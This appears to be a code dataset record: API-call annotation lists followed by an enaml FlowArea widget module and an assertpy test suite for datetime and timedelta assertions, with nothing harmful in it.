'dao.FollowDAO.FollowDAO', 'FollowDAO', ([], {}), '()\n', (10092, 10094), False, 'from dao.FollowDAO import FollowDAO\n'), ((10708, 10727), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (10721, 10727), False, 'from auth.Auth import Auth\n'), ((10877, 10883), 'pojo.User.User', 'User', ([], {}), '()\n', (10881, 10883), False, 'from pojo.User import User\n'), ((10934, 10943), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (10941, 10943), False, 'from dao.UserDAO import UserDAO\n'), ((11208, 11221), 'dao.FollowerDAO.FollowerDAO', 'FollowerDAO', ([], {}), '()\n', (11219, 11221), False, 'from dao.FollowerDAO import FollowerDAO\n'), ((11500, 11540), 'random.randint', 'random.randint', (['(10000000000)', '(99999999999)'], {}), '(10000000000, 99999999999)\n', (11514, 11540), False, 'import random\n'), ((11690, 11709), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (11703, 11709), False, 'from auth.Auth import Auth\n'), ((11948, 11954), 'pojo.User.User', 'User', ([], {}), '()\n', (11952, 11954), False, 'from pojo.User import User\n'), ((12000, 12009), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (12007, 12009), False, 'from dao.UserDAO import UserDAO\n'), ((12469, 12478), 'dao.ImageDAO.WorkDAO', 'WorkDAO', ([], {}), '()\n', (12476, 12478), False, 'from dao.ImageDAO import WorkDAO\n'), ((13044, 13063), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (13057, 13063), False, 'from auth.Auth import Auth\n'), ((14867, 14886), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (14880, 14886), False, 'from auth.Auth import Auth\n'), ((15152, 15158), 'pojo.User.User', 'User', ([], {}), '()\n', (15156, 15158), False, 'from pojo.User import User\n'), ((15204, 15213), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (15211, 15213), False, 'from dao.UserDAO import UserDAO\n'), ((16307, 16326), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (16320, 16326), False, 'from auth.Auth import Auth\n'), ((16476, 16482), 'pojo.User.User', 'User', ([], {}), '()\n', (16480, 16482), False, 'from pojo.User import User\n'), ((16533, 16542), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (16540, 16542), False, 'from dao.UserDAO import UserDAO\n'), ((16959, 16968), 'dao.ImageDAO.WorkDAO', 'WorkDAO', ([], {}), '()\n', (16966, 16968), False, 'from dao.ImageDAO import WorkDAO\n'), ((17587, 17606), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (17600, 17606), False, 'from auth.Auth import Auth\n'), ((18197, 18206), 'dao.ImageDAO.WorkDAO', 'WorkDAO', ([], {}), '()\n', (18204, 18206), False, 'from dao.ImageDAO import WorkDAO\n'), ((19084, 19103), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (19097, 19103), False, 'from auth.Auth import Auth\n'), ((19253, 19259), 'pojo.User.User', 'User', ([], {}), '()\n', (19257, 19259), False, 'from pojo.User import User\n'), ((19310, 19319), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (19317, 19319), False, 'from dao.UserDAO import UserDAO\n'), ((19891, 19897), 'pojo.Image.Work', 'Work', ([], {}), '()\n', (19895, 19897), False, 'from pojo.Image import Work\n'), ((20835, 20844), 'pojo.address.Address', 'Address', ([], {}), '()\n', (20842, 20844), False, 'from pojo.address import Address\n'), ((20963, 20972), 'dao.ImageDAO.WorkDAO', 'WorkDAO', ([], {}), '()\n', (20970, 20972), False, 'from dao.ImageDAO import WorkDAO\n'), ((21210, 21253), 're.sub', 're.sub', (['"""^data:image/.+;base64,"""', '""""""', 'image'], {}), "('^data:image/.+;base64,', '', image)\n", (21216, 21253), False, 'import re\n'), ((21266, 21297), 'base64.urlsafe_b64decode', 'base64.urlsafe_b64decode', (['image'], {}), '(image)\n', (21290, 21297), False, 'import base64\n'), ((21310, 21346), 'numpy.fromstring', 'np.fromstring', (['image'], {'dtype': 'np.uint8'}), '(image, dtype=np.uint8)\n', (21323, 21346), True, 'import numpy as np\n'), ((21359, 21382), 'cv2.imdecode', 'cv2.imdecode', (['image', '(-1)'], {}), '(image, -1)\n', (21371, 21382), False, 'import cv2\n'), ((22379, 22428), 'cv2.cvtColor', 'cv2.cvtColor', (['improved_sketch', 'cv2.COLOR_BGR2GRAY'], {}), '(improved_sketch, cv2.COLOR_BGR2GRAY)\n', (22391, 22428), False, 'import cv2\n'), ((23488, 23513), 'cv2.imwrite', 'cv2.imwrite', (['path', 'result'], {}), '(path, result)\n', (23499, 23513), False, 'import cv2\n'), ((23682, 23701), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (23695, 23701), False, 'from auth.Auth import Auth\n'), ((23851, 23857), 'pojo.User.User', 'User', ([], {}), '()\n', (23855, 23857), False, 'from pojo.User import User\n'), ((23908, 23917), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (23915, 23917), False, 'from dao.UserDAO import UserDAO\n'), ((24960, 25000), 'cv2.imwrite', 'cv2.imwrite', (["(path + '/sketch.jpg')", 'image'], {}), "(path + '/sketch.jpg', image)\n", (24971, 25000), False, 'import cv2\n'), ((25016, 25025), 'pojo.address.Address', 'Address', ([], {}), '()\n', (25023, 25025), False, 'from pojo.address import Address\n'), ((25435, 25447), 'dao.addressDAO.AddressDAO', 'AddressDAO', ([], {}), '()\n', (25445, 25447), False, 'from dao.addressDAO import AddressDAO\n'), ((25869, 25888), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (25882, 25888), False, 'from auth.Auth import Auth\n'), ((26147, 26156), 'pojo.address.Address', 'Address', ([], {}), '()\n', (26154, 26156), False, 'from pojo.address import Address\n'), ((26209, 26221), 'dao.addressDAO.AddressDAO', 'AddressDAO', ([], {}), '()\n', (26219, 26221), False, 'from dao.addressDAO import AddressDAO\n'), ((26415, 26435), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (26429, 26435), False, 'import os\n'), ((2235, 2244), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (2242, 2244), False, 'from dao.UserDAO import UserDAO\n'), ((5262, 5286), 'os.makedirs', 'os.makedirs', (['folder_path'], {}), '(folder_path)\n', (5273, 5286), False, 'import os\n'), ((13908, 13917), 'dao.ImageDAO.WorkDAO', 'WorkDAO', ([], {}), '()\n', (13915, 13917), False, 'from dao.ImageDAO import WorkDAO\n'), ((15539, 15548), 'dao.ImageDAO.WorkDAO', 'WorkDAO', ([], {}), '()\n', (15546, 15548), False, 'from dao.ImageDAO import WorkDAO\n'), ((25547, 25605), 'threading.Thread', 'threading.Thread', ([], {'target': 'handle_colorization', 'args': '(pool,)'}), '(target=handle_colorization, args=(pool,))\n', (25563, 25605), False, 'import threading\n'), ((1149, 1158), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (1156, 1158), False, 'from dao.UserDAO import UserDAO\n'), ((3208, 3224), 'dao.InformationDAO.InformationDAO', 'InformationDAO', ([], {}), '()\n', (3222, 3224), False, 'from dao.InformationDAO import InformationDAO\n')]
|
#------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from atom.api import (
Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default
)
from enaml.core.declarative import d_
from enaml.layout.geometry import Box
from .frame import Frame, ProxyFrame, Border
from .flow_item import FlowItem
class ProxyFlowArea(ProxyFrame):
""" The abstract definition of a proxy FlowArea object.
"""
#: A reference to the FlowArea declaration.
declaration = ForwardTyped(lambda: FlowArea)
def set_direction(self, direction):
raise NotImplementedError
def set_align(self, align):
raise NotImplementedError
def set_horizontal_spacing(self, spacing):
raise NotImplementedError
def set_vertical_spacing(self, spacing):
raise NotImplementedError
def set_margins(self, margins):
raise NotImplementedError
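# Note: concrete toolkit backends (e.g. a Qt implementation) are expected to
# subclass ProxyFlowArea and implement the setters above.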
class FlowArea(Frame):
""" A widget which lays out its children in flowing manner, wrapping
around at the end of the available space.
"""
#: The flow direction of the layout.
direction = d_(Enum(
'left_to_right', 'right_to_left', 'top_to_bottom', 'bottom_to_top'
))
#: The alignment of a line of items within the layout.
align = d_(Enum('leading', 'trailing', 'center', 'justify'))
#: The amount of horizontal space to place between items.
horizontal_spacing = d_(Range(low=0, value=10))
#: The amount of vertical space to place between items.
vertical_spacing = d_(Range(low=0, value=10))
#: The margins to use around the outside of the flow area.
margins = d_(Coerced(Box, (10, 10, 10, 10)))
#: A FlowArea expands freely in width and height by default.
hug_width = set_default('ignore')
hug_height = set_default('ignore')
#: A reference to the ProxyFlowArea object.
proxy = Typed(ProxyFlowArea)
def flow_items(self):
""" Get the flow item children defined on this area.
"""
return [c for c in self.children if isinstance(c, FlowItem)]
#--------------------------------------------------------------------------
# Default Handlers
#--------------------------------------------------------------------------
def _default_border(self):
""" Get the default border for the flow area.
The default value matches the default for Qt's QScrollArea.
"""
return Border(style='styled_panel', line_style='sunken')
#--------------------------------------------------------------------------
# Observers
#--------------------------------------------------------------------------
@observe(('direction', 'align', 'horizontal_spacing', 'vertical_spacing',
'margins'))
def _update_proxy(self, change):
""" An observer which sends state change to the proxy.
"""
# The superclass handler implementation is sufficient.
super(FlowArea, self)._update_proxy(change)
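# Illustrative usage sketch (not part of the original source; the enamldef
# name below is hypothetical). A FlowArea is normally declared in .enaml
# syntax, with FlowItem children wrapping the flowed content:
#
#     enamldef Main(Window):
#         FlowArea:
#             direction = 'left_to_right'
#             horizontal_spacing = 5
#             FlowItem:
#                 Container:
#                     Label:
#                         text = 'flowed item'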
|
[
"atom.api.Range",
"atom.api.Enum",
"atom.api.observe",
"atom.api.Typed",
"atom.api.ForwardTyped",
"atom.api.Coerced",
"atom.api.set_default"
] |
[((768, 799), 'atom.api.ForwardTyped', 'ForwardTyped', (['(lambda : FlowArea)'], {}), '(lambda : FlowArea)\n', (780, 799), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n'), ((2021, 2042), 'atom.api.set_default', 'set_default', (['"""ignore"""'], {}), "('ignore')\n", (2032, 2042), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n'), ((2060, 2081), 'atom.api.set_default', 'set_default', (['"""ignore"""'], {}), "('ignore')\n", (2071, 2081), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n'), ((2143, 2163), 'atom.api.Typed', 'Typed', (['ProxyFlowArea'], {}), '(ProxyFlowArea)\n', (2148, 2163), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n'), ((2932, 3020), 'atom.api.observe', 'observe', (["('direction', 'align', 'horizontal_spacing', 'vertical_spacing', 'margins')"], {}), "(('direction', 'align', 'horizontal_spacing', 'vertical_spacing',\n 'margins'))\n", (2939, 3020), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n'), ((1387, 1459), 'atom.api.Enum', 'Enum', (['"""left_to_right"""', '"""right_to_left"""', '"""top_to_bottom"""', '"""bottom_to_top"""'], {}), "('left_to_right', 'right_to_left', 'top_to_bottom', 'bottom_to_top')\n", (1391, 1459), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n'), ((1550, 1598), 'atom.api.Enum', 'Enum', (['"""leading"""', '"""trailing"""', '"""center"""', '"""justify"""'], {}), "('leading', 'trailing', 'center', 'justify')\n", (1554, 1598), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n'), ((1691, 1713), 'atom.api.Range', 'Range', ([], {'low': '(0)', 'value': '(10)'}), '(low=0, value=10)\n', (1696, 1713), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n'), ((1802, 1824), 'atom.api.Range', 'Range', ([], {'low': '(0)', 'value': '(10)'}), '(low=0, value=10)\n', (1807, 1824), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n'), ((1907, 1937), 'atom.api.Coerced', 'Coerced', (['Box', '(10, 10, 10, 10)'], {}), '(Box, (10, 10, 10, 10))\n', (1914, 1937), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n')]
|
# Copyright (c) 2015-2019, Activision Publishing, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import datetime
from assertpy import assert_that, fail
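# d1 is a module-level reference datetime shared by the tests below.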
d1 = datetime.datetime.today()
def test_is_before():
d2 = datetime.datetime.today()
assert_that(d1).is_before(d2)
def test_is_before_failure():
try:
d2 = datetime.datetime.today()
assert_that(d2).is_before(d1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be before <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_before_bad_val_type_failure():
try:
assert_that(123).is_before(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_before_bad_arg_type_failure():
try:
assert_that(d1).is_before(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_after():
d2 = datetime.datetime.today()
assert_that(d2).is_after(d1)
def test_is_after_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_after(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be after <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_after_bad_val_type_failure():
try:
assert_that(123).is_after(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_after_bad_arg_type_failure():
try:
assert_that(d1).is_after(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_equal_to_ignoring_milliseconds():
assert_that(d1).is_equal_to_ignoring_milliseconds(d1)
def test_is_equal_to_ignoring_milliseconds_failure():
try:
d2 = datetime.datetime.today() + datetime.timedelta(days=1)
assert_that(d1).is_equal_to_ignoring_milliseconds(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be equal to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_equal_to_ignoring_milliseconds_bad_val_type_failure():
try:
assert_that(123).is_equal_to_ignoring_milliseconds(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_equal_to_ignoring_milliseconds_bad_arg_type_failure():
try:
assert_that(d1).is_equal_to_ignoring_milliseconds(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_equal_to_ignoring_seconds():
assert_that(d1).is_equal_to_ignoring_seconds(d1)
def test_is_equal_to_ignoring_seconds_failure():
try:
d2 = datetime.datetime.today() + datetime.timedelta(days=1)
assert_that(d1).is_equal_to_ignoring_seconds(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}> to be equal to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}>, but was not.')
def test_is_equal_to_ignoring_seconds_bad_val_type_failure():
try:
assert_that(123).is_equal_to_ignoring_seconds(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_equal_to_ignoring_seconds_bad_arg_type_failure():
try:
assert_that(d1).is_equal_to_ignoring_seconds(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_equal_to_ignoring_time():
assert_that(d1).is_equal_to_ignoring_time(d1)
def test_is_equal_to_ignoring_time_failure():
try:
d2 = datetime.datetime.today() + datetime.timedelta(days=1)
assert_that(d1).is_equal_to_ignoring_time(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2}> to be equal to <\d{4}-\d{2}-\d{2}>, but was not.')
def test_is_equal_to_ignoring_time_bad_val_type_failure():
try:
assert_that(123).is_equal_to_ignoring_time(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_equal_to_ignoring_time_bad_arg_type_failure():
try:
assert_that(d1).is_equal_to_ignoring_time(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_greater_than():
d2 = datetime.datetime.today()
assert_that(d2).is_greater_than(d1)
def test_is_greater_than_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_greater_than(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be greater than <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_greater_than_bad_arg_type_failure():
try:
assert_that(d1).is_greater_than(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <datetime>, but was <int>')
def test_is_greater_than_or_equal_to():
assert_that(d1).is_greater_than_or_equal_to(d1)
def test_is_greater_than_or_equal_to_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_greater_than_or_equal_to(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be greater than or equal to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_greater_than_or_equal_to_bad_arg_type_failure():
try:
assert_that(d1).is_greater_than_or_equal_to(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <datetime>, but was <int>')
def test_is_less_than():
d2 = datetime.datetime.today()
assert_that(d1).is_less_than(d2)
def test_is_less_than_failure():
try:
d2 = datetime.datetime.today()
assert_that(d2).is_less_than(d1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be less than <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_less_than_bad_arg_type_failure():
try:
assert_that(d1).is_less_than(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <datetime>, but was <int>')
def test_is_less_than_or_equal_to():
assert_that(d1).is_less_than_or_equal_to(d1)
def test_is_less_than_or_equal_to_failure():
try:
d2 = datetime.datetime.today()
assert_that(d2).is_less_than_or_equal_to(d1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be less than or equal to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_less_than_or_equal_to_bad_arg_type_failure():
try:
assert_that(d1).is_less_than_or_equal_to(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <datetime>, but was <int>')
def test_is_between():
d2 = datetime.datetime.today()
d3 = datetime.datetime.today()
assert_that(d2).is_between(d1, d3)
def test_is_between_failure():
try:
d2 = datetime.datetime.today()
d3 = datetime.datetime.today()
assert_that(d1).is_between(d2, d3)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be between <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> and <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_between_bad_arg1_type_failure():
try:
assert_that(d1).is_between(123, 456)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given low arg must be <datetime>, but was <int>')
def test_is_between_bad_arg2_type_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_between(d2, 123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given high arg must be <datetime>, but was <datetime>')
def test_is_not_between():
d2 = d1 + datetime.timedelta(minutes=5)
d3 = d1 + datetime.timedelta(minutes=10)
assert_that(d1).is_not_between(d2, d3)
def test_is_not_between_failure():
try:
d2 = d1 + datetime.timedelta(minutes=5)
d3 = d1 + datetime.timedelta(minutes=10)
assert_that(d2).is_not_between(d1, d3)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to not be between <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> and <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was.')
def test_is_not_between_bad_arg1_type_failure():
try:
assert_that(d1).is_not_between(123, 456)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given low arg must be <datetime>, but was <int>')
def test_is_not_between_bad_arg2_type_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_not_between(d2, 123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given high arg must be <datetime>, but was <datetime>')
def test_is_close_to():
d2 = datetime.datetime.today()
assert_that(d1).is_close_to(d2, datetime.timedelta(minutes=5))
def test_is_close_to_failure():
try:
d2 = d1 + datetime.timedelta(minutes=5)
assert_that(d1).is_close_to(d2, datetime.timedelta(minutes=1))
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be close to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> within tolerance <\d+:\d{2}:\d{2}>, but was not.')
def test_is_close_to_bad_arg_type_failure():
try:
assert_that(d1).is_close_to(123, 456)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was <int>')
def test_is_close_to_bad_tolerance_arg_type_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_close_to(d2, 123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given tolerance arg must be timedelta, but was <int>')
def test_is_not_close_to():
d2 = d1 + datetime.timedelta(minutes=5)
assert_that(d1).is_not_close_to(d2, datetime.timedelta(minutes=4))
def test_is_not_close_to_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_not_close_to(d2, datetime.timedelta(minutes=5))
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to not be close to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> within tolerance <\d+:\d{2}:\d{2}>, but was.')
def test_is_not_close_to_bad_arg_type_failure():
try:
assert_that(d1).is_not_close_to(123, 456)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was <int>')
def test_is_not_close_to_bad_tolerance_arg_type_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_not_close_to(d2, 123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given tolerance arg must be timedelta, but was <int>')
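# t1 is a module-level reference timedelta shared by the timedelta tests below.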
t1 = datetime.timedelta(seconds=60)
def test_is_greater_than_timedelta():
d2 = datetime.timedelta(seconds=120)
assert_that(d2).is_greater_than(t1)
def test_is_greater_than_timedelta_failure():
try:
t2 = datetime.timedelta(seconds=90)
assert_that(t1).is_greater_than(t2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be greater than <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_greater_than_timedelta_bad_arg_type_failure():
try:
assert_that(t1).is_greater_than(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <timedelta>, but was <int>')
def test_is_greater_than_or_equal_to_timedelta():
assert_that(t1).is_greater_than_or_equal_to(t1)
def test_is_greater_than_or_equal_to_timedelta_failure():
try:
t2 = datetime.timedelta(seconds=90)
assert_that(t1).is_greater_than_or_equal_to(t2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be greater than or equal to <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_greater_than_or_equal_to_timedelta_bad_arg_type_failure():
try:
assert_that(t1).is_greater_than_or_equal_to(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <timedelta>, but was <int>')
def test_is_less_than_timedelta():
t2 = datetime.timedelta(seconds=90)
assert_that(t1).is_less_than(t2)
def test_is_less_than_timedelta_failure():
try:
t2 = datetime.timedelta(seconds=90)
assert_that(t2).is_less_than(t1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be less than <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_less_than_timedelta_bad_arg_type_failure():
try:
assert_that(t1).is_less_than(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <timedelta>, but was <int>')
def test_is_less_than_or_equal_to_timedelta():
assert_that(t1).is_less_than_or_equal_to(t1)
def test_is_less_than_or_equal_to_timedelta_failure():
try:
t2 = datetime.timedelta(seconds=90)
assert_that(t2).is_less_than_or_equal_to(t1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be less than or equal to <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_less_than_or_equal_to_timedelta_bad_arg_type_failure():
try:
assert_that(t1).is_less_than_or_equal_to(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <timedelta>, but was <int>')
def test_is_between_timedelta():
d2 = datetime.timedelta(seconds=90)
d3 = datetime.timedelta(seconds=120)
assert_that(d2).is_between(t1, d3)
def test_is_between_timedelta_failure():
try:
d2 = datetime.timedelta(seconds=30)
d3 = datetime.timedelta(seconds=40)
assert_that(t1).is_between(d2, d3)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be between <\d{1,2}:\d{2}:\d{2}> and <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_not_between_timedelta():
d2 = datetime.timedelta(seconds=90)
d3 = datetime.timedelta(seconds=120)
assert_that(t1).is_not_between(d2, d3)
def test_is_not_between_timedelta_failure():
try:
d2 = datetime.timedelta(seconds=90)
d3 = datetime.timedelta(seconds=120)
assert_that(d2).is_not_between(t1, d3)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to not be between <\d{1,2}:\d{2}:\d{2}> and <\d{1,2}:\d{2}:\d{2}>, but was.')
|
[
"assertpy.assert_that",
"datetime.timedelta",
"datetime.datetime.today",
"assertpy.fail"
] |
